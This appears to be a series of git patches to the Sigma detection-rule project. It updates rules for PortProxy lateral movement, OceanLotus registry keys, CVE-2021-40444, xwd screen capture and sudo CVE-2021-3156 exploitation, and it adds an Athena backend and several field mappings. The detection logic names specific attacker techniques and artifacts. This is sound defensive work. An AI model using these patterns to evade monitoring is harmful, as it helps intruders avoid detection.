a/rules/windows/registry_event/win_portproxy_registry_key.yml +++ b/rules/windows/registry_event/win_portproxy_registry_key.yml @@ -7,6 +7,7 @@ references: - https://adepts.of0x.cc/netsh-portproxy-code/ - https://www.dfirnotes.net/portproxy_detection/ date: 2021/06/22 +modified: 2021/09/13 tags: - attack.lateral_movement - attack.defense_evasion @@ -18,7 +19,7 @@ logsource: product: windows detection: selection_registry: - TargetObject: 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp' + TargetObject: 'HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp' condition: selection_registry falsepositives: - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) From 047ebab36bd97a222164d1aa26ed180db3882b87 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 13 Sep 2021 14:01:39 +0200 Subject: [PATCH 0932/1367] fix HKCU --- .../registry_event/sysmon_apt_oceanlotus_registry.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml index 243d2d7e..d726d245 100755 --- a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml +++ b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml @@ -9,14 +9,14 @@ tags: - attack.t1112 author: megan201296, Jonhnathan Ribeiro date: 2019/04/14 -modified: 2020/09/06 +modified: 2021/09/13 logsource: category: registry_event product: windows detection: selection: TargetObject: - - 'HKCR\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + - 'HKCU\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' TargetObject|endswith: # covers HKU\* and HKLM.. - '\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application' @@ -27,7 +27,7 @@ detection: - '\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon' selection2: TargetObject|startswith: - - 'HKU\' + - 'HKCU\' TargetObject|contains: # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\ - '_Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\' From dd9921b3602c933d4fb060b2bfe73eed74096e44 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 19:41:01 +0700 Subject: [PATCH 0933/1367] Update win_file_winword_cve_2021_40444.yml Add modified date --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 1c20b1f8..2cb6e196 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -7,6 +7,7 @@ references: - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 author: Florian Roth, Sittikorn S date: 2021/09/10 +modified: 2021/09/13 logsource: product: windows category: file_event From a8f9617ccd25b52663015a57dd923c60535068db Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Mon, 13 Sep 2021 18:56:33 +0200 Subject: [PATCH 0934/1367] New Rule - Linux - Auditd - Screen Capture with xwd --- .../auditd/lnx_auditd_screencaputre_xwd.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml diff --git a/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml new file mode 100644 index 00000000..ffffdae9 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml @@ -0,0 +1,31 @@ +title: Screen Capture with xwd +id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c +description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations +author: 'Pawel Mazur' +status: experimental +date: 2021/09/13 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md + - https://attack.mitre.org/techniques/T1113/ + - https://linux.die.net/man/1/xwd +logsource: + product: linux + service: auditd +detection: + xwd: + type: EXECVE + a0: xwd + xwd_root_window: + a1: '-root' + a2: '-out' + a3|endswith: '.xwd' + xwd_no_root_window: + a1: '-out' + a2|endswith: '.xwd' + condition: xwd and (xwd_root_window or xwd_no_root_window) +tags: + - attack.collection + - attack.t1113 +falsepositives: + - Legitimate use of screenshot utility +level: low \ No newline at end of file From e47a7d9826107d7c5a2c6320babc8bdd78664f67 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Mon, 13 Sep 2021 19:08:23 +0200 Subject: [PATCH 0935/1367] Update lnx_auditd_screencaputre_xwd.yml --- rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml index ffffdae9..0af916ba 100644 --- a/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml +++ b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml @@ -1,4 +1,4 @@ -title: Screen Capture with xwd +title: Screen Capture with Xwd id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations author: 'Pawel Mazur' @@ -28,4 +28,4 @@ tags: - attack.t1113 falsepositives: - Legitimate use of screenshot utility -level: low \ No newline at end of file +level: low From 58d9e4180adcfc166dbf667d9d6ca24c660f24bb Mon Sep 17 00:00:00 2001 From: Mark McCurdy Date: Mon, 13 Sep 2021 14:17:33 -0500 Subject: [PATCH 0936/1367] Correct for proper output to Splunk and CarbonBlack. Add AWS Athena config/backend support --- tools/config/athena.yml | 10 + tools/config/carbon-black-eedr.yml | 1 + tools/config/crowdstrike.yml | 14 ++ tools/sigma/backends/athena.py | 304 ++++++++++++++++++++++++++++ tools/sigma/backends/carbonblack.py | 1 + tools/sigma/backends/splunk.py | 4 +- 6 files changed, 332 insertions(+), 2 deletions(-) create mode 100644 tools/config/athena.yml create mode 100644 tools/sigma/backends/athena.py diff --git a/tools/config/athena.yml b/tools/config/athena.yml new file mode 100644 index 00000000..601567f5 --- /dev/null +++ b/tools/config/athena.yml @@ -0,0 +1,10 @@ +title: AWS Athena +order: 20 +backends: + - athena +fieldmappings: + eventName: eventname + eventSource: eventsource + eventType: eventtype + userIdentity.type: useridentity.type + userIdentity.sessionContext.sessionIssuer.type: sessionissuer diff --git a/tools/config/carbon-black-eedr.yml b/tools/config/carbon-black-eedr.yml index 0e7c4fff..da98001d 100644 --- a/tools/config/carbon-black-eedr.yml +++ b/tools/config/carbon-black-eedr.yml @@ -31,6 +31,7 @@ fieldmappings: - netconn_ipv6 DestinationPort: netconn_port Device: device_name + EventID: event_id FileName: - process_name - process_original_filename diff --git a/tools/config/crowdstrike.yml b/tools/config/crowdstrike.yml index 25309412..f1eb5593 100644 --- a/tools/config/crowdstrike.yml +++ b/tools/config/crowdstrike.yml @@ -16,4 +16,18 @@ fieldmappings: EventID: EventID CommandLine: Commandline Command_Line: Commandline + cmdline: Commandline Image: ImageFileName + TargetFilename: TargetFilename + TaskName: TaskName + Image: ImageFileName + image: ImageFileName + image_path: ImageFileName + OriginalFileName: ImageFileName + sha1: SHA1HashData + user: UserName + TaskName: TaskName + ParentImage: ParentBaseFileName + parent_image: ParentBaseFileName + ServiceName: ServiceName + TargetFilename: TargetFileName diff --git a/tools/sigma/backends/athena.py b/tools/sigma/backends/athena.py new file mode 100644 index 00000000..81957ac0 --- /dev/null +++ b/tools/sigma/backends/athena.py @@ -0,0 +1,304 @@ +# Output backends for sigmac +# Copyright 2019 Jayden Zheng +# Copyright 2020 Jonas Hagg +# Copyright 2021 wagga (https://github.com/wagga40/) + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import re +import sigma +from sigma.backends.base import SingleTextQueryBackend +from sigma.parser.condition import SigmaAggregationParser, NodeSubexpression, ConditionAND, ConditionOR, ConditionNOT +from sigma.parser.exceptions import SigmaParseError +class SQLBackend(SingleTextQueryBackend): + """Converts Sigma rule into SQL query""" + identifier = "athena" + active = True + + andToken = " AND " # Token used for linking expressions with logical AND + orToken = " OR " # Same for OR + notToken = "NOT " # Same for NOT + subExpression = "(%s)" # Syntax for subexpressions, usually parenthesis around it. %s is inner expression + listExpression = "(%s)" # Syntax for lists, %s are list items separated with listSeparator + listSeparator = ", " # Character for separation of list items + valueExpression = "\'%s\'" # Expression of values, %s represents value + nullExpression = "-%s=*" # Expression of queries for null values or non-existing fields. %s is field name + notNullExpression = "%s=*" # Expression of queries for not null values. %s is field name + mapExpression = "%s = %s" # Syntax for field/value conditions. First %s is fieldname, second is value + mapMulti = "%s IN %s" # Syntax for field/value conditions. First %s is fieldname, second is value + mapWildcard = "%s LIKE %s ESCAPE \'\\\'"# Syntax for swapping wildcard conditions: Adding \ as escape character + mapSource = "%s=%s" # Syntax for sourcetype + mapListsSpecialHandling = False # Same handling for map items with list values as for normal values (strings, integers) if True, generateMapItemListNode method is called with node + mapListValueExpression = "%s OR %s" # Syntax for field/value condititons where map value is a list + mapLength = "(%s %s)" + + options = SingleTextQueryBackend.options + ( + ("table", "eventlog", "Use this option to specify table name.", None), + ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), + ("selection", False, "Use this option to enable fields selection from Sigma rules.", None), + ) + + selection_enabled = False + + + def __init__(self, sigmaconfig, options): + super().__init__(sigmaconfig) + + if "table" in options: + self.table = options["table"] + else: + self.table = "eventlog" + + if "select" in options and options["select"]: + self.select_fields = options["select"].split(',') + else: + self.select_fields = list() + + if "selection" in options: + self.selection_enabled = True + + def generateANDNode(self, node): + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + return self.andToken.join(filtered) + else: + return None + + def generateORNode(self, node): + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + return self.orToken.join(filtered) + else: + return None + + def generateNOTNode(self, node): + generated = self.generateNode(node.item) + if generated is not None: + return self.notToken + generated + else: + return None + + def generateSubexpressionNode(self, node): + generated = self.generateNode(node.items) + if generated: + return self.subExpression % generated + else: + return None + + def generateListNode(self, node): + if not set([type(value) for value in node]).issubset({str, int}): + raise TypeError("List values must be strings or numbers") + return self.listExpression % (self.listSeparator.join([self.generateNode(value) for value in node])) + + def generateMapItemNode(self, node): + fieldname, value = node + transformed_fieldname = self.fieldNameMapping(fieldname, value) + + has_wildcard = re.search(r"((\\(\*|\?|\\))|\*|\?|_|%)", self.generateNode(value)) + + if "," in self.generateNode(value) and not has_wildcard: + return self.mapMulti % (transformed_fieldname, self.generateNode(value)) + elif "LENGTH" in transformed_fieldname: + return self.mapLength % (transformed_fieldname, value) + elif type(value) == list: + return self.generateMapItemListNode(transformed_fieldname, value) + elif self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): + if has_wildcard: + return self.mapWildcard % (transformed_fieldname, self.generateNode(value)) + else: + return self.mapExpression % (transformed_fieldname, self.generateNode(value)) + elif "sourcetype" in transformed_fieldname: + return self.mapSource % (transformed_fieldname, self.generateNode(value)) + elif has_wildcard: + return self.mapWildcard % (transformed_fieldname, self.generateNode(value)) + else: + raise TypeError("Backend does not support map values of type " + str(type(value))) + + def generateMapItemListNode(self, key, value): + return "(" + (" OR ".join([self.mapWildcard % (key, self.generateValueNode(item)) for item in value])) + ")" + + def generateValueNode(self, node): + return self.valueExpression % (self.cleanValue(str(node))) + + def generateNULLValueNode(self, node): + return self.nullExpression % (node.item) + + def generateNotNULLValueNode(self, node): + return self.notNullExpression % (node.item) + + def fieldNameMapping(self, fieldname, value): + """ + Alter field names depending on the value(s). Backends may use this method to perform a final transformation of the field name + in addition to the field mapping defined in the conversion configuration. The field name passed to this method was already + transformed from the original name given in the Sigma rule. + """ + return fieldname + + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + fields = list() + + # First add fields specified in the rule + try: + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + if type(mapped) == str: + fields.append(mapped) + elif type(mapped) == list: + fields.extend(mapped) + else: + raise TypeError("Field mapping must return string or list") + + except KeyError: # no 'fields' attribute + pass + + # Then add fields specified in the backend configuration + fields.extend(self.select_fields) + + # In case select is specified in backend option, we want to enable selection + if len(self.select_fields) > 0: + self.selection_enabled = True + + # Finally, in case fields is empty, add the default value + if not fields: + fields = list("*") + + for parsed in sigmaparser.condparsed: + if self.selection_enabled: + query = self._generateQueryWithFields(parsed, fields) + else: + query = self.generateQuery(parsed) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + + def cleanValue(self, val): + if not isinstance(val, str): + return str(val) + + #Single backlashes which are not in front of * or ? are doulbed + val = re.sub(r"(? full text search + #False: no subexpression found, where a full text search is needed + + def _evaluateCondition(condition): + #Helper function to evaluate conditions + if type(condition) not in [ConditionAND, ConditionOR, ConditionNOT]: + raise NotImplementedError("Error in recursive Search logic") + + results = [] + for elem in condition.items: + if isinstance(elem, NodeSubexpression): + results.append(self._recursiveFtsSearch(elem)) + if isinstance(elem, ConditionNOT): + results.append(_evaluateCondition(elem)) + if isinstance(elem, tuple): + results.append(False) + if type(elem) in (str, int, list): + return True + return any(results) + + if type(subexpression) in [str, int, list]: + return True + elif type(subexpression) in [tuple]: + return False + + if not isinstance(subexpression, NodeSubexpression): + raise NotImplementedError("Error in recursive Search logic") + + if isinstance(subexpression.items, NodeSubexpression): + return self._recursiveFtsSearch(subexpression.items) + elif type(subexpression.items) in [ConditionAND, ConditionOR, ConditionNOT]: + return _evaluateCondition(subexpression.items) diff --git a/tools/sigma/backends/carbonblack.py b/tools/sigma/backends/carbonblack.py index cf517577..20325e6e 100644 --- a/tools/sigma/backends/carbonblack.py +++ b/tools/sigma/backends/carbonblack.py @@ -157,6 +157,7 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB def generateMapItemNode(self, node): fieldname, value = node + value = str(value) if fieldname == "EventID" and (type(value) is str or type(value) is int): fieldname = self.generateEventKey(value) value = self.generateEventValue(value) diff --git a/tools/sigma/backends/splunk.py b/tools/sigma/backends/splunk.py index c2bfb96b..ca294f5c 100644 --- a/tools/sigma/backends/splunk.py +++ b/tools/sigma/backends/splunk.py @@ -178,7 +178,7 @@ class CrowdStrikeBackend(SplunkBackend): def generate(self, sigmaparser): lgs = sigmaparser.parsedyaml.get("logsource") - if lgs.get("product") == "windows" and (lgs.get("service") == "sysmon" or lgs.get("category") == "process_creation"): + if lgs.get("product") == "windows" and (lgs.get("service") == "sysmon" or lgs.get("category") == "process_creation" or lgs.get("service") == "security"): fieldmappings = sigmaparser.config.fieldmappings detections = sigmaparser.definitions all_fields = dict() @@ -210,4 +210,4 @@ class CrowdStrikeBackend(SplunkBackend): raise NotImplementedError("Not supported logsources!") def generateMapItemTypedNode(self, fieldname, value): - return super().generateMapItemTypedNode(fieldname=fieldname, value=value) \ No newline at end of file + return super().generateMapItemTypedNode(fieldname=fieldname, value=value) From 87affad990af47750f23c65fd395158522aa2ce7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 13 Sep 2021 21:31:25 -0500 Subject: [PATCH 0937/1367] Create ecs-okta.yml --- tools/config/ecs-okta.yml | 47 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 tools/config/ecs-okta.yml diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml new file mode 100644 index 00000000..beae8617 --- /dev/null +++ b/tools/config/ecs-okta.yml @@ -0,0 +1,47 @@ +title: Elastic Common Schema And Elastic Exported Fields Mapping For Okta logs +order: 20 +backends: + - es-qs + - es-dsl + - es-rule + - kibana + - kibana-ndjson + - xpack-watcher + - elastalert + - elastalert-dsl +fieldmappings: + ClientIp: okta.client.ip + UserAgentRawUserAgent: okta.client.user_agent.raw_user_agent + UserAgentOs: okta.client.user_agent.os + UserAgentBrowser: okta.client.user_agent.browser + ClientZone: okta.client.zone + ClientDevice: okta.client.device + ClientId: okta.client.id + OutcomeReason: okta.outcome.reason + OutcomeResult: okta.event.outcome + Target: okta.target + TransactionId: okta.transaction.id + TransactionType: okta.transaction.type + DeviceFingerprint: okta.debug_context.debug_data.device_fingerprint + RequestId: okta.debug_context.debug_data.request_id + RequestUri: okta.debug_context.debug_data.request_uri + ThreatSuspected: okta.debug_context.debug_data.threat_suspected + Url: okta.debug_context.debug_data.url + SuspiciousActivityBrowser: okta.debug_context.debug_data.suspicious_activity.browser + SuspiciousActivityEventCity : okta.debug_context.debug_data.suspicious_activity.event_city + SuspiciousActivityEventCountry : okta.debug_context.debug_data.suspicious_activity.event_country + SuspiciousActivityEventId : okta.debug_context.debug_data.suspicious_activity.event_id + SuspiciousActivityEventIp : okta.debug_context.debug_data.suspicious_activity.event_ip + SuspiciousActivityEventLatitude : okta.debug_context.debug_data.suspicious_activity.event_latitude + SuspiciousActivityEventLongitude : okta.debug_context.debug_data.suspicious_activity.event_longitude + SuspiciousActivityEventState : okta.debug_context.debug_data.suspicious_activity.event_state + SuspiciousActivityEventTransactionId : okta.debug_context.debug_data.suspicious_activity.event_transaction_id + SuspiciousActivityEventType : okta.debug_context.debug_data.suspicious_activity.event_type + SuspiciousActivityEventOs : okta.debug_context.debug_data.suspicious_activity.os + SuspiciousActivityEventTimestamp : okta.debug_context.debug_data.suspicious_activity.timestamp + AuthenticationProvider: okta.authentication_context.authentication_provider + AuthenticationCredentialProvider: okta.authentication_context.credential_provider + AuthenticationCredentialType: okta.authentication_context.credential_type + AuthenticationIssuer: okta.authentication_context.issuer + AuthenticationExternalSessionID: okta.authentication_context.external_session_id + AuthenticationInterface: okta.authentication_context.interface From 94e47dcbb36d4af95419050ae1ffcdaac70268e4 Mon Sep 17 00:00:00 2001 From: Mark McCurdy Date: Mon, 13 Sep 2021 21:34:52 -0500 Subject: [PATCH 0938/1367] removing duplicate mappings due to yamllint --- tools/config/crowdstrike.yml | 3 --- 1 file changed, 3 deletions(-) diff --git a/tools/config/crowdstrike.yml b/tools/config/crowdstrike.yml index f1eb5593..28c1b8af 100644 --- a/tools/config/crowdstrike.yml +++ b/tools/config/crowdstrike.yml @@ -19,8 +19,6 @@ fieldmappings: cmdline: Commandline Image: ImageFileName TargetFilename: TargetFilename - TaskName: TaskName - Image: ImageFileName image: ImageFileName image_path: ImageFileName OriginalFileName: ImageFileName @@ -30,4 +28,3 @@ fieldmappings: ParentImage: ParentBaseFileName parent_image: ParentBaseFileName ServiceName: ServiceName - TargetFilename: TargetFileName From 15bd61ed9f9460e486222e4a4673ec02055d81de Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 13 Sep 2021 21:45:14 -0500 Subject: [PATCH 0939/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 88 +++++++++++++++++++++++---------------- 1 file changed, 53 insertions(+), 35 deletions(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index beae8617..60a526b0 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml @@ -10,38 +10,56 @@ backends: - elastalert - elastalert-dsl fieldmappings: - ClientIp: okta.client.ip - UserAgentRawUserAgent: okta.client.user_agent.raw_user_agent - UserAgentOs: okta.client.user_agent.os - UserAgentBrowser: okta.client.user_agent.browser - ClientZone: okta.client.zone - ClientDevice: okta.client.device - ClientId: okta.client.id - OutcomeReason: okta.outcome.reason - OutcomeResult: okta.event.outcome - Target: okta.target - TransactionId: okta.transaction.id - TransactionType: okta.transaction.type - DeviceFingerprint: okta.debug_context.debug_data.device_fingerprint - RequestId: okta.debug_context.debug_data.request_id - RequestUri: okta.debug_context.debug_data.request_uri - ThreatSuspected: okta.debug_context.debug_data.threat_suspected - Url: okta.debug_context.debug_data.url - SuspiciousActivityBrowser: okta.debug_context.debug_data.suspicious_activity.browser - SuspiciousActivityEventCity : okta.debug_context.debug_data.suspicious_activity.event_city - SuspiciousActivityEventCountry : okta.debug_context.debug_data.suspicious_activity.event_country - SuspiciousActivityEventId : okta.debug_context.debug_data.suspicious_activity.event_id - SuspiciousActivityEventIp : okta.debug_context.debug_data.suspicious_activity.event_ip - SuspiciousActivityEventLatitude : okta.debug_context.debug_data.suspicious_activity.event_latitude - SuspiciousActivityEventLongitude : okta.debug_context.debug_data.suspicious_activity.event_longitude - SuspiciousActivityEventState : okta.debug_context.debug_data.suspicious_activity.event_state - SuspiciousActivityEventTransactionId : okta.debug_context.debug_data.suspicious_activity.event_transaction_id - SuspiciousActivityEventType : okta.debug_context.debug_data.suspicious_activity.event_type - SuspiciousActivityEventOs : okta.debug_context.debug_data.suspicious_activity.os - SuspiciousActivityEventTimestamp : okta.debug_context.debug_data.suspicious_activity.timestamp - AuthenticationProvider: okta.authentication_context.authentication_provider - AuthenticationCredentialProvider: okta.authentication_context.credential_provider - AuthenticationCredentialType: okta.authentication_context.credential_type - AuthenticationIssuer: okta.authentication_context.issuer - AuthenticationExternalSessionID: okta.authentication_context.external_session_id - AuthenticationInterface: okta.authentication_context.interface + : okta.actor.id + : okta.actor.type + : okta.actor.alternate_id + : okta.actor.display_name + : okta.client.ip + : okta.client.user_agent.raw_user_agent + : okta.client.user_agent.os + : okta.client.user_agent.browser + : okta.client.zone + : okta.client.device + : okta.client.id + : okta.outcome.reason + : event.outcome + : okta.target + : okta.transaction.id + : okta.transaction.type + : okta.debug_context.debug_data.device_fingerprint + : okta.debug_context.debug_data.request_id + : okta.debug_context.debug_data.request_uri + : okta.debug_context.debug_data.threat_suspected + : okta.debug_context.debug_data.url + : okta.debug_context.debug_data.suspicious_activity.browser + : okta.debug_context.debug_data.suspicious_activity.event_city + : okta.debug_context.debug_data.suspicious_activity.event_country + : okta.debug_context.debug_data.suspicious_activity.event_id + : okta.debug_context.debug_data.suspicious_activity.event_ip + : okta.debug_context.debug_data.suspicious_activity.event_latitude + : okta.debug_context.debug_data.suspicious_activity.event_longitude + : okta.debug_context.debug_data.suspicious_activity.event_state + : okta.debug_context.debug_data.suspicious_activity.event_transaction_id + : okta.debug_context.debug_data.suspicious_activity.event_type + : okta.debug_context.debug_data.suspicious_activity.os + : okta.debug_context.debug_data.suspicious_activity.timestamp + : okta.authentication_context.authentication_provider + : okta.authentication_context.authentication_step + : okta.authentication_context.credential_provider + : okta.authentication_context.credential_type + : okta.authentication_context.issuer + : okta.authentication_context.external_session_id + : okta.authentication_context.interface + : okta.security_context.as.number + : okta.security_context.as.organization.name + : okta.security_context.isp + : okta.security_context.domain + : okta.security_context.is_proxy + : okta.request.ip_chain.ip + : okta.request.ip_chain.version + : okta.request.ip_chain.source + : okta.request.ip_chain.geographical_context.city + : okta.request.ip_chain.geographical_context.state + : okta.request.ip_chain.geographical_context.postal_code + : okta.request.ip_chain.geographical_context.country + : okta.request.ip_chain.geographical_context.geolocation From 18959065805ec3265c2542b6e51e2a47f04b9372 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 13 Sep 2021 22:16:43 -0500 Subject: [PATCH 0940/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 40 +++++++++++++++++++++------------------ 1 file changed, 22 insertions(+), 18 deletions(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index 60a526b0..c08d7015 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml @@ -10,20 +10,24 @@ backends: - elastalert - elastalert-dsl fieldmappings: - : okta.actor.id - : okta.actor.type - : okta.actor.alternate_id - : okta.actor.display_name - : okta.client.ip - : okta.client.user_agent.raw_user_agent - : okta.client.user_agent.os - : okta.client.user_agent.browser - : okta.client.zone - : okta.client.device - : okta.client.id - : okta.outcome.reason - : event.outcome - : okta.target + client.user.id: okta.actor.id + source.user.id: okta.actor.id + User: okta.actor.type + alternateId: okta.actor.alternate_id + client.user.full_name: okta.actor.display_name + source.user.full_name: okta.actor.display_name + related.user: okta.actor.display_name + client.ip: okta.client.ip + source.ip: okta.client.ip + user_agent.original: okta.client.user_agent.raw_user_agent + userAgent.os: okta.client.user_agent.os + userAgent.browser: okta.client.user_agent.browser + client.zone: okta.client.zone + client.device: okta.client.device + client.id: okta.client.id + event.action: okta.event_type + outcome.reason: okta.outcome.reason + event.outcome: okta.event.outcome : okta.transaction.id : okta.transaction.type : okta.debug_context.debug_data.device_fingerprint @@ -50,10 +54,10 @@ fieldmappings: : okta.authentication_context.issuer : okta.authentication_context.external_session_id : okta.authentication_context.interface - : okta.security_context.as.number - : okta.security_context.as.organization.name - : okta.security_context.isp - : okta.security_context.domain + client.as.number: okta.security_context.as.number + client.as.organization.name: okta.security_context.as.organization.name + client.domain: okta.security_context.isp + source.domain: okta.security_context.domain : okta.security_context.is_proxy : okta.request.ip_chain.ip : okta.request.ip_chain.version From 2a52cef62ec5a9cff7f979ebbc8e80d6c93e4cf0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 13 Sep 2021 22:29:19 -0500 Subject: [PATCH 0941/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 35 ----------------------------------- 1 file changed, 35 deletions(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index c08d7015..a4ac6009 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml @@ -28,42 +28,7 @@ fieldmappings: event.action: okta.event_type outcome.reason: okta.outcome.reason event.outcome: okta.event.outcome - : okta.transaction.id - : okta.transaction.type - : okta.debug_context.debug_data.device_fingerprint - : okta.debug_context.debug_data.request_id - : okta.debug_context.debug_data.request_uri - : okta.debug_context.debug_data.threat_suspected - : okta.debug_context.debug_data.url - : okta.debug_context.debug_data.suspicious_activity.browser - : okta.debug_context.debug_data.suspicious_activity.event_city - : okta.debug_context.debug_data.suspicious_activity.event_country - : okta.debug_context.debug_data.suspicious_activity.event_id - : okta.debug_context.debug_data.suspicious_activity.event_ip - : okta.debug_context.debug_data.suspicious_activity.event_latitude - : okta.debug_context.debug_data.suspicious_activity.event_longitude - : okta.debug_context.debug_data.suspicious_activity.event_state - : okta.debug_context.debug_data.suspicious_activity.event_transaction_id - : okta.debug_context.debug_data.suspicious_activity.event_type - : okta.debug_context.debug_data.suspicious_activity.os - : okta.debug_context.debug_data.suspicious_activity.timestamp - : okta.authentication_context.authentication_provider - : okta.authentication_context.authentication_step - : okta.authentication_context.credential_provider - : okta.authentication_context.credential_type - : okta.authentication_context.issuer - : okta.authentication_context.external_session_id - : okta.authentication_context.interface client.as.number: okta.security_context.as.number client.as.organization.name: okta.security_context.as.organization.name client.domain: okta.security_context.isp source.domain: okta.security_context.domain - : okta.security_context.is_proxy - : okta.request.ip_chain.ip - : okta.request.ip_chain.version - : okta.request.ip_chain.source - : okta.request.ip_chain.geographical_context.city - : okta.request.ip_chain.geographical_context.state - : okta.request.ip_chain.geographical_context.postal_code - : okta.request.ip_chain.geographical_context.country - : okta.request.ip_chain.geographical_context.geolocation From 7ff0ff104ae2ee98459bc81ec5d2e33918d899b6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 14 Sep 2021 01:52:03 -0500 Subject: [PATCH 0942/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index a4ac6009..0a8baefd 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml @@ -1,4 +1,4 @@ -title: Elastic Common Schema And Elastic Exported Fields Mapping For Okta logs +title: Elastic Exported Fields Mapping For Okta logs order: 20 backends: - es-qs From 1e4484bffb44505a3c797f0a328a889d7051e373 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:22:56 +0200 Subject: [PATCH 0943/1367] split lnx_auditd_cve_2021_3156_sudo_buffer_overflow --- ...itd_cve_2021_3156_sudo_buffer_overflow.yml | 17 +++-------- ...21_3156_sudo_buffer_overflow_brutforce.yml | 29 +++++++++++++++++++ 2 files changed, 33 insertions(+), 13 deletions(-) create mode 100644 rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index 737df5c2..7ff4fa3f 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -1,5 +1,5 @@ -action: global title: CVE-2021-3156 Exploitation Attempt +id: 